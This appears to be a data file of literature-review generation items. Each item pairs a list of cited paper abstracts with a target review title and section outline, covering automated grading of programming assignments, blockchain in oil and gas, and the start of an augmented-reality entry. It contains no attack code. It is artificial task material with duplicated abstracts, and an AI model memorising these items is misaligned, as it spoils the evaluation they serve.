StreamBit programmers competed with a group of experienced C programmers on implementing a cipher. We learned that, given the same time budget, the ciphers developed in StreamBit ran 2.5x faster than ciphers coded in C. We also produced implementations of DES and Serpent that were competitive with hand optimized implementations available in the public domain. --- paper_title: Constructing a core literature for computing education research paper_content: After four decades of research on a broad range of topics, computing education has now emerged as a mature research community, with its own journals, conferences, and monographs. Despite this success, the computing education research community still lacks a commonly recognized core literature. A core literature can help a research community to develop a common orientation and make it easier for new researchers to enter the community. This paper proposes an approach to constructing and maintaining a core literature for computing education research. It includes a model for classifying research contributions and a methodology for determining whether they should be included in the core. The model and methodology have been applied to produce an initial list of core papers. An annotated list of these papers is given in appendix A. 
--- paper_title: Web-CAT: automatically grading programming assignments paper_content: This demonstration introduces participants to using Web-CAT, an open-source automated grading system. Web-CAT is customizable and extensible, allowing it to support a wide variety of programming languages and assessment strategies. Web-CAT is most well-known as the system that "grades students on how well they test their own code," with experimental evidence that it offers greater learning benefits than more traditional output-comparison grading. Participants will learn how to set up courses, prepare reference tests, set up assignments, and allow graders to manually grade for design. --- paper_title: Tool Design and Student Testing Behavior in an Introductory Java Course paper_content: This paper examines the effects of tool design on student testing behavior in an introductory course. Two tools are considered: BlueJ and WebCAT. A small modification was made to the BlueJ test recording interface to encourage students to engage more deeply in the testing process. A larger percentage of tests submitted by students using the modified BlueJ interface were correct. Further, the solutions they submitted contained fewer lines of code while being similarly complete and correct. Evidence is given that students using both BlueJ versions often rely on Web-CAT to validate their solution methods before testing the methods themselves. In response a new Web-CAT grading plug-in is proposed that we believe will better promote an incremental code-a-little test-a-little development style. --- paper_title: Design and Evaluation of Automated Scoring: Java Programming Assignments paper_content: This paper presents a web-based automatic scoring system for Java programming assignments, and reports evaluation results in an actual programming course. The system receives Java application programs submitted by students and returns the test results immediately. The test consists of compiler check, JUnit test, and result test. The result test is very useful for assignments in elementary programming courses, because a typical program is composed of only a main method that reads/writes data from/to the standard input/output devices. The system was used and evaluated in an actual course of our university. The authors confirmed that the system is very helpful for students to improve their programming skills. Especially, many students noticed and corrected their mistakes by repeating submission of their programs again several times. --- paper_title: Grading student programs using ASSYST paper_content: The task of grading solutions to student programming exercises is laborious and error-prone. We have developed a software tool called ASSYST that is designed to relieve a tutor of much of the burden of assessing such programs. ASSYST offers a graphical interface that can be used to direct all aspects of the grading process, and it considers a wide range of criteria in its automatic assessment. Experience with the system has been encouraging. --- paper_title: Practical Programming in TCL & TK paper_content: From the Publisher: ::: "The world's #1 guide to Tcl/Tk has been updated to reflect Tcl/Tk 8.4's powerful improvements in functionality, flexibility, and performance. Brent Welch, Ken Jones, and Jeffrey Hobbs, three of the world's leading Tcl/Tk experts, cover every facet of Tcl/Tk programming, including cross-platform scripting and GUI development, networking, enterprise application integration, and much more." 
"Coverage includes: systematic explanations and sample code for all Tcl/Tk 8.4 core commands; complete Tk GUI development guidance - perfect for developers working with Perl, Python, or Ruby; insider's insights into Tcl 8.4's key enhancements - VFS layer, internationalized font/character set support, new widgets, and more; definitive coverage of TclHttpd web server (written by its creator); new ways to leverage Tcl/Tk 8.4's major performance improvements; and advanced coverage - threading, Safe Tcl, Tcl script library, regular expressions, and namespaces." Whether you're upgrading to Tcl/Tk 8.4, or building GUIs for applications created with other languages or just searching for a better cross-platform scripting solution, Practical Programming in Tcl and Tk, Fourth Edition delivers all you need to get results. --- paper_title: Semi-Automatic Assessment of Unrestrained Java Code: A Library, a DSL, and a Workbench to Assess Exams and Exercises paper_content: Automated marking of multiple-choice exams is of great interest in university courses with a large number of students. For this reason, it has been systematically implanted in almost all universities. Automatic assessment of source code is however less extended. There are several reasons for that. One reason is that almost all existing systems are based on output comparison with a gold standard. If the output is the expected, the code is correct. Otherwise, it is reported as wrong, even if there is only one typo in the code. Moreover, why it is wrong remains a mystery. In general, assessment tools treat the code as a black box, and they only assess the externally observable behavior. In this work we introduce a new code assessment method that also verifies properties of the code, thus allowing to mark the code even if it is only partially correct. We also report about the use of this system in a real university context, showing that the system automatically assesses around 50% of the work. --- paper_title: Experience using "MOSS" to detect cheating on programming assignments paper_content: Program assignments are traditionally an area of serious concern in maintaining the integrity of the educational process. Systematic inspection of all solutions for possible plagiarism has generally required unrealistic amounts of time and effort. The "Measure Of Software Similarity" tool developed by Alex Aiken at UC Berkeley makes it possible to objectively and automatically check all solutions for evidence of plagiarism. The authors have used MOSS in several large sections of a C programming course (MOSS can also handle a variety of other languages). They feel that MOSS is a major innovation for faculty who teach programming and recommend that it be used routinely to screen for plagiarism. --- paper_title: Web-based grading: further experiences and student attitudes paper_content: This paper describes recent improvements to and experiences with Web-based grading software that has been developed by the author at Ohio University. The software, named WBGP for the web-based grading project, provides facilities to build, test, and annotate student source code with comments concerning programming style and documentation. The software produces a collection of Web-pages for each student project that describes the results of testing, the grading decisions, and the resulting score. The software is able to build student portfolios consisting of all students projects for a given course. 
In addition, the software is able to generate reports on the type and frequency of grading comments and the correctness of student projects. The paper describes continued experiences in web-based grading of computer science projects at Ohio University. In particular, we describe the various challenges of grading interactive student projects. Finally, this paper describes the results of a student survey concerning the web-based grading software. Students were surveyed concerning the ease of use and understanding of the generated Web-pages, their attitudes towards student portfolios, and their attitudes towards web-based grading. In general, the students' responses were positive. ---
Title: Automated Grading Systems for Programming Assignments: A Literature Review Section 1: INTRODUCTION Description 1: Discuss the need for automated grading tools in programming assignments, especially in large classes, and provide an overview of the paper's structure. Section 2: SOFTWARE DEFECTS Description 2: Introduce the types of errors targeted by automated grading techniques including syntax errors, logical errors, and runtime errors. Section 3: Unit Testing Description 3: Explain the use and significance of unit testing in automated grading systems, including its implementation and benefits. Section 4: Sketching Synthesis and Error Statistical Modeling (ESM) Description 4: Describe the tool based on sketching synthesis and ESM used for providing instant feedback in programming assignments. Section 5: Peer-To-Peer Feedback Description 5: Discuss the peer-to-peer feedback approach in grading and its advantages and limitations. Section 6: Random Inputs Test Cases Description 6: Describe the use of random inputs to test programming assignments and the limitations of this approach. Section 7: Pattern Matching Description 7: Explain how pattern matching is used to verify the correctness of student assignments and discuss its drawbacks. Section 8: Comparison Description 8: Provide a comparison of the different error detection techniques highlighted in the paper. Section 9: EXISTING SYSTEMS FOR AUTOMATED GRADING Description 9: Review the various existing automated grading systems, categorizing them into automated, semi-automated, and manual grading systems. Section 10: Automated Grading Systems Description 10: Detail specific automated grading systems, how they function, their advantages, and their limitations. Section 11: Semi-Automatic Grading Systems Description 11: Discuss examples of semi-automatic grading systems, their processes, benefits, and challenges. Section 12: Manual Grading Systems Description 12: Present manual grading systems, describing how they incorporate instructor and peer involvement. Section 13: COMPARISON OF EXISTING GRADING SYSTEMS Description 13: Provide a comparative overview of all the existing grading systems discussed in the paper. Section 14: CONCLUSION Description 14: Summarize the findings from the review, highlighting the limitations of current systems and suggesting directions for future work.
Blockchain Technology in the Oil and Gas Industry: A Review of Applications, Opportunities, Challenges, and Risks
7
--- paper_title: Blockchain Authentication of Network Applications: Taxonomy, Classification, Capabilities, Open Challenges, Motivations, Recommendations and Future Directions paper_content: Abstract As the first and last line of defence in many cases, authentication is a crucial part of a system. With authentication, any unauthorised access to the system can be prevented. This work maps the research landscape through two means. The first is a comprehensive taxonomy of blockchain technology in authentication over networking. The second is identification of different types of authentication systems under various platforms that use blockchain technology. This work also provides useful and classified information which can enhance the understanding of how various authentication systems can be combined with blockchain technology. In addition, problems associated with this blockchain technology and proposed solutions are surveyed to fulfil the requirements of the network applications. Moreover, this work highlights the importance, capabilities, motivations and challenges of blockchain technology with distinct applications in various fields. Finally, recommendations and future research directions are discussed. --- paper_title: A survey on security and privacy issues of blockchain technology paper_content: Blockchain is gaining traction and can be termed as one of the furthermost prevalent topics nowadays. Although critics question about its scalability, security, and sustainability, it has already transformed many individuals' lifestyle in some areas due to its inordinate influence on industries and businesses. Granting that the features of blockchain technology guarantee more reliable and expedient services, it is important to consider the security and privacy issues and challenges behind the innovative technology. The spectrum of blockchain applications range from financial, healthcare, automobile, risk management, Internet of things (IoT) to public and social services. Several studies focus on utilizing the blockchain data structure in various applications. However, a comprehensive survey on technical and applications perspective has not yet been accomplished. In this paper, we try to conduct a comprehensive survey on the blockchain technology by discussing its structure to different consensus algorithms as well as the challenges and opportunities from the prospective of security and privacy of data in blockchains. Furthermore, we delve into future trends the blockchain technology can adapt in the years to come. Index Terms- Blockchains, Future Trends of Blockchains, Security, Privacy --- paper_title: A peer-to-peer transaction authentication platform for mobile commerce with semi-offline architecture paper_content: Trusted third-party (TTP) based transaction authentication is traditionally applied to authenticate mobile commerce transactions. However, several issues can arise with this, including seller fraud, TTP performance bottlenecks, and the risk of operations being interrupted. A peer-to-peer mobile commerce transaction authentication platform (MCTAP) with a semi-offline transaction authentication mechanism is proposed in this work. In this, both buyer and seller mutually authenticate and sign the digital receipt for each other. The trusted transaction authentication center thus no longer needs to operate online transaction verification processes, and only has to deal with consumer disputes. 
MCTAP can raise the efficiency of transaction authentication and provide solutions for the one-way transaction notification systems adopted by most online shopping sites that may encounter seller fraud. The proposed solution is compared to other TTP-based and secure electronic transaction based transaction authentication mechanisms, and the results indicate that the MCTAP has the advantages of efficiency and a higher security level. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attention recently. Blockchain serves as an immutable ledger which allows transactions to take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation systems and the Internet of Things (IoT), and so on. However, there are still many challenges of blockchain technology, such as scalability and security problems, waiting to be overcome. This paper presents a comprehensive overview of blockchain technology. We first provide an overview of blockchain architecture and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Conceptualizing Blockchains: Characteristics & Applications paper_content: Blockchain technology has recently gained widespread attention from media, businesses, public sector agencies, and various international organizations, and it is being regarded as potentially even more disruptive than the Internet. Despite significant interest, there is a dearth of academic literature that describes key components of blockchains and discusses potential applications. This paper aims to address this gap. This paper presents an overview of blockchain technology, identifies the blockchain's key functional characteristics, builds a formal definition, and offers a discussion and classification of current and emerging blockchain applications. --- paper_title: Blockchain technology in the chemical industry: Machine-to-machine electricity market paper_content: The purpose of this paper is to explore applications of blockchain technology related to the 4th Industrial Revolution (Industry 4.0) and to present an example where blockchain is employed to facilitate machine-to-machine (M2M) interactions and establish an M2M electricity market in the context of the chemical industry. The presented scenario includes two electricity producers and one electricity consumer trading with each other over a blockchain. All participants are supplied with realistic data produced by process flow sheet models. This work contributes a proof-of-concept implementation of the scenario. Additionally, this paper describes and discusses the research and application landscape of blockchain technology in relation to Industry 4.0. It concludes that this technology has significant under-researched potential to support and enhance the efficiency gains of the revolution and identifies areas for future research. --- paper_title: Storage Protocol for Securing Blockchain Transparency paper_content: There are several studies that propose identity management that utilizes blockchain technology. In Ethereum, the main programmable blockchain system, data on a blockchain are saved as encoded binaries for executing automatic verification.
To decode a binary, users need to know the application binary interface (ABI) that describes the data structure of the registered information. However, the manner in which the ABI is shared in the current blockchain protocol is opaque. To resolve this problem, we describe a new protocol for embedding the ABI in a blockchain transaction when a registrant registers information. Our method enables users to read registered data with information on the blockchain alone, and it guarantees transparency without requiring users to trust third parties. --- paper_title: Blockchains and Smart Contracts for the Internet of Things paper_content: Motivated by the recent explosion of interest around blockchains, we examine whether they make a good fit for the Internet of Things (IoT) sector. Blockchains allow us to have a distributed peer-to-peer network where non-trusting members can interact with each other without a trusted intermediary, in a verifiable manner. We review how this mechanism works and also look into smart contracts—scripts that reside on the blockchain that allow for the automation of multi-step processes. We then move into the IoT domain, and describe how a blockchain-IoT combination: 1) facilitates the sharing of services and resources leading to the creation of a marketplace of services between devices and 2) allows us to automate in a cryptographically verifiable manner several existing, time-consuming workflows. We also point out certain issues that should be considered before the deployment of a blockchain network in an IoT setting: from transactional privacy to the expected value of the digitized assets traded on the network. Wherever applicable, we identify solutions and workarounds. Our conclusion is that the blockchain-IoT combination is powerful and can cause significant transformations across several industries, paving the way for new business models and novel, distributed applications. --- paper_title: Unlocking Blockchain: Embracing New Technologies to drive Efficiency and Empower the Citizen paper_content: With their innovative and fundamentally liberalising approach to data storage, distributed ledger technologies (DLTs) like blockchain and other associated technologies offer immense benefits to both the public and private sectors, not least in terms of upping efficiency. Lovers of freedom should also note, however, that they offer an important chance to empower individuals in their necessary engagements with the state, and to rebuild societal trust for the common good. In this paper, we propose the establishment of a UK-based international blockchain competition, and a public-facing ‘Chief Blockchain Officer’. We also propose a UK ‘blockchain departmental target’: a long-term aim for government departments to make a 1% efficiency saving by embracing blockchain and other associated innovative technologies. A renewed UK focus on efficiency and the opportunities of new technology would be inspirational, and we look forward to discussing these proposals, and carrying out further research into Distributed Ledger Technologies. --- paper_title: Conceptualizing Blockchains: Characteristics & Applications paper_content: Blockchain technology has recently gained widespread attention from media, businesses, public sector agencies, and various international organizations, and it is being regarded as potentially even more disruptive than the Internet.
Despite significant interest, there is a dearth of academic literature that describes key components of blockchains and discusses potential applications. This paper aims to address this gap. This paper presents an overview of blockchain technology, identifies the blockchain's key functional characteristics, builds a formal definition, and offers a discussion and classification of current and emerging blockchain applications. --- paper_title: On the Activity Privacy of Blockchain for IoT paper_content: Blockchain has received tremendous attention as a distributed platform to enhance the security of the Internet of Things (IoT). The history of communications is stored in the blockchain, which introduces auditability. On the flip side, new privacy risks are introduced as the entire history of IoT device communication is exposed to participants. We study the likelihood of classifying IoT devices by analyzing the temporal patterns of their transactions, which, to the best of our knowledge, is the first work of its kind. We apply machine learning algorithms on blockchain data to analyze the success rate of device classification. Our results demonstrate success rates over 90% in classifying devices. We propose three timestamp obfuscation methods, namely combining multiple packets into a single transaction, merging ledgers of multiple devices, and randomly delaying transactions, to reduce the success rate in classifying devices; these methods reduce the classification success rates to as low as 24%. --- paper_title: A systematic literature review of blockchain-based applications: Current status, classification and open issues paper_content: Abstract This work provides a systematic literature review of blockchain-based applications across multiple domains. The aim is to investigate the current state of blockchain technology and its applications and to highlight how specific characteristics of this disruptive technology can revolutionise “business-as-usual” practices. To this end, the theoretical underpinnings of numerous research papers published in high-ranked scientific journals during the last decade, along with several reports from grey literature as a means of streamlining our assessment and capturing the continuously expanding blockchain domain, are included in this review. Based on a structured, systematic review and thematic content analysis of the discovered literature, we present a comprehensive classification of blockchain-enabled applications across diverse sectors such as supply chain, business, healthcare, IoT, privacy, and data management, and we establish key themes, trends and emerging areas for research. We also point to the shortcomings identified in the relevant literature, particularly limitations that blockchain technology presents and how these limitations span across different sectors and industries. Building on these findings, we identify various research gaps and future exploratory directions that are anticipated to be of significant value both for academics and practitioners. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attention recently. Blockchain serves as an immutable ledger which allows transactions to take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation systems and the Internet of Things (IoT), and so on.
However, there are still many challenges of blockchain technology, such as scalability and security problems, waiting to be overcome. This paper presents a comprehensive overview of blockchain technology. We first provide an overview of blockchain architecture and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Blockchain as a Service for IoT paper_content: A blockchain is a distributed and decentralized ledger that contains connected blocks of transactions. Unlike other ledger approaches, blockchain guarantees tamper-proof storage of approved transactions. Due to its distributed and decentralized organization, blockchain is being used within IoT, e.g., to manage device configuration, store sensor data and enable micro-payments. This paper presents the idea of using blockchain as a service for IoT and evaluates the performance of a cloud- and edge-hosted blockchain implementation. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attention recently. Blockchain serves as an immutable ledger which allows transactions to take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation systems and the Internet of Things (IoT), and so on. However, there are still many challenges of blockchain technology, such as scalability and security problems, waiting to be overcome. This paper presents a comprehensive overview of blockchain technology. We first provide an overview of blockchain architecture and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Blockchain characteristics and consensus in modern business processes paper_content: Abstract Blockchain technology has attracted a great deal of attention as an effective way to innovate business processes. It has to be integrated with other Business Process Management (BPM) system components to implement specified functionalities related to the applications. The current efforts in integrating this technology into BPM are at a very early stage. To apply Blockchain to business processes efficiently, Blockchain and business process characteristics must be identified. Inconsistency of confirmation settlement, which heavily relies on the implementation of the consensus protocol, poses a major challenge in business process operations, especially ones that are time-critical. In addition, validators, nodes responsible for performing consensus operations in a Blockchain system, can introduce bias and as a result are not trustworthy. This paper first defines Blockchain and also investigates the characteristics of Blockchain and business processes. Then, we suggest an architecture of business processes in the Blockchain era to overcome the problems of time inconsistency and consensus bias. The architecture provides the persistency, validity, auditability, and disintermediation that Blockchain offers. The architecture also provides flexibility by allowing business partners to select nodes in performing consensus; thus bias is mitigated.
--- paper_title: On the Security and Performance of Proof of Work Blockchains paper_content: Proof of Work (PoW) powered blockchains currently account for more than 90% of the total market capitalization of existing digital cryptocurrencies. Although the security provisions of Bitcoin have been thoroughly analysed, the security guarantees of variant (forked) PoW blockchains (which were instantiated with different parameters) have not received much attention in the literature. This opens the question whether existing security analysis of Bitcoin's PoW applies to other implementations which have been instantiated with different consensus and/or network parameters. In this paper, we introduce a novel quantitative framework to analyse the security and performance implications of various consensus and network parameters of PoW blockchains. Based on our framework, we devise optimal adversarial strategies for double-spending and selfish mining while taking into account real world constraints such as network propagation, different block sizes, block generation intervals, information propagation mechanism, and the impact of eclipse attacks. Our framework therefore allows us to capture existing PoW-based deployments as well as PoW blockchain variants that are instantiated with different parameters, and to objectively compare the tradeoffs between their performance and security provisions. --- paper_title: A Survey about Consensus Algorithms Used in Blockchain paper_content: Thanks to its potential in many applications, Blockchain has recently been nominated as one of the technologies exciting intense attention. Blockchain has solved the problem of changing the original low-trust centralized ledger held by a single third-party, to a high-trust decentralized form held by different entities, or in other words, verifying nodes. The key contribution of the work of Blockchain is the consensus algorithm, which decides how agreement is made to append a new block between all nodes in the verifying network. Blockchain algorithms can be categorized into two main groups. The first group is proof-based consensus, which requires the nodes joining the verifying network to show that they are more qualified than the others to do the appending work. The second group is voting-based consensus, which requires nodes in the network to exchange their results of verifying a new block or transaction, before making the final decision. In this paper, we present a review of the Blockchain consensus algorithms that have been researched and that are being applied in some well-known applications at this time. --- paper_title: PPCoin: Peer-to-Peer Crypto-Currency with Proof-of-Stake paper_content: A peer-to-peer crypto-currency design derived from Satoshi Nakamoto’s Bitcoin. Proof-of-stake replaces proof-of-work to provide most of the network security. Under this hybrid design proof-of-work mainly provides initial minting and is largely non-essential in the long run. Security level of the network is not dependent on energy consumption in the long term thus providing an energyefficient and more cost-competitive peer-to-peer crypto-currency. Proof-of-stake is based on coin age and generated by each node via a hashing scheme bearing similarity to Bitcoin’s but over limited search space. Block chain history and transaction settlement are further protected by a centrally broadcasted checkpoint mechanism. 
--- paper_title: A Survey about Consensus Algorithms Used in Blockchain paper_content: Thanks to its potential in many applications, Blockchain has recently been nominated as one of the technologies exciting intense attention. Blockchain has solved the problem of changing the original low-trust centralized ledger held by a single third-party, to a high-trust decentralized form held by different entities, or in other words, verifying nodes. The key contribution of the work of Blockchain is the consensus algorithm, which decides how agreement is made to append a new block between all nodes in the verifying network. Blockchain algorithms can be categorized into two main groups. The first group is proof-based consensus, which requires the nodes joining the verifying network to show that they are more qualified than the others to do the appending work. The second group is voting-based consensus, which requires nodes in the network to exchange their results of verifying a new block or transaction, before making the final decision. In this paper, we present a review of the Blockchain consensus algorithms that have been researched and that are being applied in some well-known applications at this time. --- paper_title: A privacy-preserving Internet of Things device management scheme based on blockchain paper_content: Blockchain as a new technique has attracted attentions from industry and academics for sharing data across organizations. Many blockchain-based data sharing applications, such as Internet of Things... --- paper_title: Hybrid Cryptographic Protocol for Secure Vehicle Data Sharing Over a Consortium Blockchain paper_content: The blockchain technology has recently attracted increasing interests in a wide range of use-cases. Among those, the management of vehicles' data and life cycle over a blockchain has sparked various research initiatives on a global scale, with the promise to prevent automobile frauds and to enable more collaborations between the involved stakeholders. In this paper, we investigate the problem of securing and sharing vehicles' data over a consortium blockchain, and we describe the architecture of the implemented proof-of-concept. Then, we introduce a novel hybrid cryptographic protocol to secure the access to vehicles' data between the involved stakeholders. Finally, we discuss the lessons learned acquired from the preliminary trials and we highlight the future research challenges and opportunities. --- paper_title: From Pretty Good To Great: Enhancing PGP using Bitcoin and the Blockchain paper_content: PGP is built upon a Distributed Web of Trust in which a user’s trustworthiness is established by others who can vouch through a digital signature for that user’s identity. Preventing its wholesale adoption are a number of inherent weaknesses to include (but not limited to) the following: 1) Trust Relationships are built on a subjective honor system, 2) Only first degree relationships can be fully trusted, 3) Levels of trust are difficult to quantify with actual values, and 4) Issues with the Web of Trust itself (Certification and Endorsement). Although the security that PGP provides is proven to be reliable, it has largely failed to garner large scale adoption. In this paper, we propose several novel contributions to address the aforementioned issues with PGP and associated Web of Trust. 
To address the subjectivity of the Web of Trust, we provide a new certificate format based on Bitcoin which allows a user to verify a PGP certificate using Bitcoin identity-verification transactions - forming first degree trust relationships that are tied to actual values (i.e., number of Bitcoins transferred during transaction). Secondly, we present the design of a novel Distributed PGP key server that leverages the Bitcoin transaction blockchain to store and retrieve our certificates. --- paper_title: Step by Step Towards Creating a Safe Smart Contract: Lessons and Insights from a Cryptocurrency Lab paper_content: We document our experiences in teaching smart contract programming to undergraduate students at the University of Maryland, the first pedagogical attempt of its kind. Since smart contracts deal directly with the movement of valuable currency units between contractual parties, security of a contract program is of paramount importance. --- paper_title: The Internet Blockchain: A Distributed, Tamper-Resistant Transaction Framework for the Internet paper_content: Existing security mechanisms for managing the Internet infrastructural resources like IP addresses, AS numbers, BGP advertisements and DNS mappings rely on a Public Key Infrastructure (PKI) that can be potentially compromised by state actors and Advanced Persistent Threats (APTs). Ideally the Internet infrastructure needs a distributed and tamper-resistant resource management framework which cannot be subverted by any single entity. A secure, distributed ledger enables such a mechanism and the blockchain is the best known example of distributed ledgers. In this paper, we propose the use of a blockchain based mechanism to secure the Internet BGP and DNS infrastructure. While the blockchain has scaling issues to be overcome, the key advantages of such an approach include the elimination of any PKI-like root of trust, a verifiable and distributed transaction history log, multi-signature based authorizations for enhanced security, easy extensibility and scriptable programmability to secure new types of Internet resources and potential for a built in cryptocurrency. A tamper resistant DNS infrastructure also ensures that it is not possible for the application level PKI to spoof HTTPS traffic. --- paper_title: Blockchains and Smart Contracts for the Internet of Things paper_content: Motivated by the recent explosion of interest around blockchains, we examine whether they make a good fit for the Internet of Things (IoT) sector. Blockchains allow us to have a distributed peer-to-peer network where non-trusting members can interact with each other without a trusted intermediary, in a verifiable manner. We review how this mechanism works and also look into smart contracts—scripts that reside on the blockchain that allow for the automation of multi-step processes. We then move into the IoT domain, and describe how a blockchain-IoT combination: 1) facilitates the sharing of services and resources leading to the creation of a marketplace of services between devices and 2) allows us to automate in a cryptographically verifiable manner several existing, time-consuming workflows. We also point out certain issues that should be considered before the deployment of a blockchain network in an IoT setting: from transactional privacy to the expected value of the digitized assets traded on the network. Wherever applicable, we identify solutions and workarounds. 
Our conclusion is that the blockchain-IoT combination is powerful and can cause significant transformations across several industries, paving the way for new business models and novel, distributed applications. --- paper_title: The Paradox of Compliance: Infringements and Delays in Transposing European Union Directives paper_content: What impact does the negotiation stage prior to the adoption of international agreements have on the subsequent implementation stage? We address this question by examining the linkages between decision making on European Union directives and any subsequent infringements and delays in national transposition. We formulate a preference-based explanation of failures to comply, which focuses on states’ incentives to deviate and the amount of discretion granted to states. This is compared with state-based explanations that focus on country-specific characteristics. Infringements are more likely when states disagree with the content of directives and the directives provide them with little discretion. Granting discretion to member states, however, tends to lead to longer delays in transposition. We find no evidence of country-specific effects. --- paper_title: Disclosure as Governance: The Extractive Industries Transparency Initiative and Resource Management in the Developing World paper_content: The global promotion of transparency for the extractive sector-oil, gas and mining-has become increasingly accepted as an appropriate solution to weaknesses in governance in resource-rich developing nations. Proponents argue that if extractive firms disclose publicly their payments to governments, citizens will be able to hold governments accountable. This will improve the management of natural resources, reduce corruption, and mitigate conflict. These beliefs are embodied in the Extractive Industries Transparency Initiative (EITI), initially a unilateral effort launched by Tony Blair that has evolved into a global program. Why has transparency become the solution of choice for managing natural resource wealth, and how has the EITI evolved? This article argues that intersecting transnational networks with complementary global norms facilitated construction of transparency as a solution for management of resource revenues. This in turn promoted the gradual expansion of the institutional architecture, membership, and scope of the EITI despite significant political barriers. (c) 2010 by the Massachusetts Institute of Technology. --- paper_title: Impact of the Dodd-Frank Act on Credit Ratings paper_content: We analyze the impact of the Dodd-Frank Wall Street Reform and Consumer Protection Act (Dodd-Frank) on corporate bond ratings issued by credit rating agencies (CRAs). We find no evidence that Dodd-Frank disciplines CRAs to provide more accurate and informative credit ratings. Instead, following Dodd-Frank, CRAs issue lower ratings, give more false warnings, and issue downgrades that are less informative. These results are consistent with the reputation model of Morris (2001), and suggest that CRAs become more protective of their reputation following the passage of Dodd-Frank. Consistent with Morris (2001), we find that our results are stronger for industries with low Fitch market share, where Moody׳s and Standard & Poor׳s have stronger incentives to protect their reputation (Becker and Milbourn, 2011). Our results are not driven by business cycle effects or firm characteristics, and strengthen as the uncertainty regarding the passage of Dodd-Frank gets resolved. 
We conclude that increasing the legal and regulatory costs to CRAs might have an adverse effect on the quality of credit ratings. --- paper_title: Blockchain Standards for Compliance and Trust paper_content: Blockchain methods are emerging as practical tools for validation, record-keeping, and access control in addition to their early applications in cryptocurrency. This column explores the options for use of blockchains to enhance security, trust, and compliance in a variety of industry settings and explores the current state of blockchain standards. --- paper_title: ProvChain: A Blockchain-Based Data Provenance Architecture in Cloud Environment with Enhanced Privacy and Availability paper_content: Cloud data provenance is metadata that records the history of the creation and operations performed on a cloud data object. Secure data provenance is crucial for data accountability, forensics and privacy. In this paper, we propose a decentralized and trusted cloud data provenance architecture using blockchain technology. Blockchain-based data provenance can provide tamper-proof records, enable the transparency of data accountability in the cloud, and help to enhance the privacy and availability of the provenance data. We make use of the cloud storage scenario and choose the cloud file as a data unit to detect user operations for collecting provenance data. We design and implement ProvChain, an architecture to collect and verify cloud data provenance, by embedding the provenance data into blockchain transactions. ProvChain operates mainly in three phases: (1) provenance data collection, (2) provenance data storage, and (3) provenance data validation. Results from performance evaluation demonstrate that ProvChain provides security features including tamper-proof provenance, user privacy and reliability with low overhead for the cloud storage applications. --- paper_title: Enabling Blockchain Innovations with Pegged Sidechains paper_content: Since the introduction of Bitcoin[Nak09] in 2009, and the multiple computer science and electronic cash innovations it brought, there has been great interest in the potential of decentralised cryptocurrencies. At the same time, implementation changes to the consensuscritical parts of Bitcoin must necessarily be handled very conservatively. As a result, Bitcoin has greater difficulty than other Internet protocols in adapting to new demands and accommodating new innovation. We propose a new technology, pegged sidechains, which enables bitcoins and other ledger assets to be transferred between multiple blockchains. This gives users access to new and innovative cryptocurrency systems using the assets they already own. By reusing Bitcoin’s currency, these systems can more easily interoperate with each other and with Bitcoin, avoiding the liquidity shortages and market fluctuations associated with new currencies. Since sidechains are separate systems, technical and economic innovation is not hindered. Despite bidirectional transferability between Bitcoin and pegged sidechains, they are isolated: in the case of a cryptographic break (or malicious design) in a sidechain, the damage is entirely confined to the sidechain itself. This paper lays out pegged sidechains, their implementation requirements, and the work needed to fully benefit from the future of interconnected blockchains. ---
Title: Blockchain Technology in the Oil and Gas Industry: A Review of Applications, Opportunities, Challenges, and Risks Section 1: INTRODUCTION Description 1: Introduce the significance of oil and gas resources, current management issues in the industry, and the potential of blockchain technology to address these issues. Section 2: MOTIVATION Description 2: Discuss the motivations behind exploring blockchain technology for the oil and gas industry, emphasizing the need for better understanding and implementation. Section 3: CONTRIBUTIONS Description 3: Summarize the main contributions of the paper, including the discussion of blockchain technologies, their application in the oil and gas industry, and the analysis of their opportunities, challenges, and risks. Section 4: THEORIES OF BLOCKCHAIN Description 4: Provide an overview of the basic theories and key technologies of blockchain, including the concept, characteristics, classification, consensus algorithms, cryptography and security technologies, data record models, and distributed storage systems. Section 5: BLOCKCHAIN IN OIL AND GAS INDUSTRY Description 5: Analyze the potential application scenarios of blockchain technology in the oil and gas industry, including trading, management and decision-making, supervision, and cybersecurity. Present real-world examples. Section 6: DISCUSSIONS Description 6: Discuss the current status, opportunities, challenges, risks, and development trends of blockchain technology in the oil and gas industry. Section 7: CONCLUSIONS Description 7: Summarize the findings and conclusions of the paper, highlighting the potential of blockchain technology in the industry and the steps needed to overcome challenges and risks.
3D Object Manipulation Techniques in Handheld Mobile Augmented Reality Interface: A Review
10
--- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: Recent Advances in Augmented Reality paper_content: In 1997, Azuma published a survey on augmented reality (AR). Our goal is to complement, rather than replace, the original survey by presenting representative examples of the new advances. We refer one to the original survey for descriptions of potential applications (such as medical visualization, maintenance and repair of complex equipment, annotation, and path planning); summaries of AR system characteristics (such as the advantages and disadvantages of optical and video approaches to blending virtual and real, problems in display focus and contrast, and system portability); and an introduction to the crucial problem of registration, including sources of registration error and error-reduction strategies. --- paper_title: A Survey of Augmented Reality Technologies, Applications and Limitations paper_content: We are on the verge of ubiquitously adopting Augmented Reality (AR) technologies to enhance our percep- tion and help us see, hear, and feel our environments in new and enriched ways. AR will support us 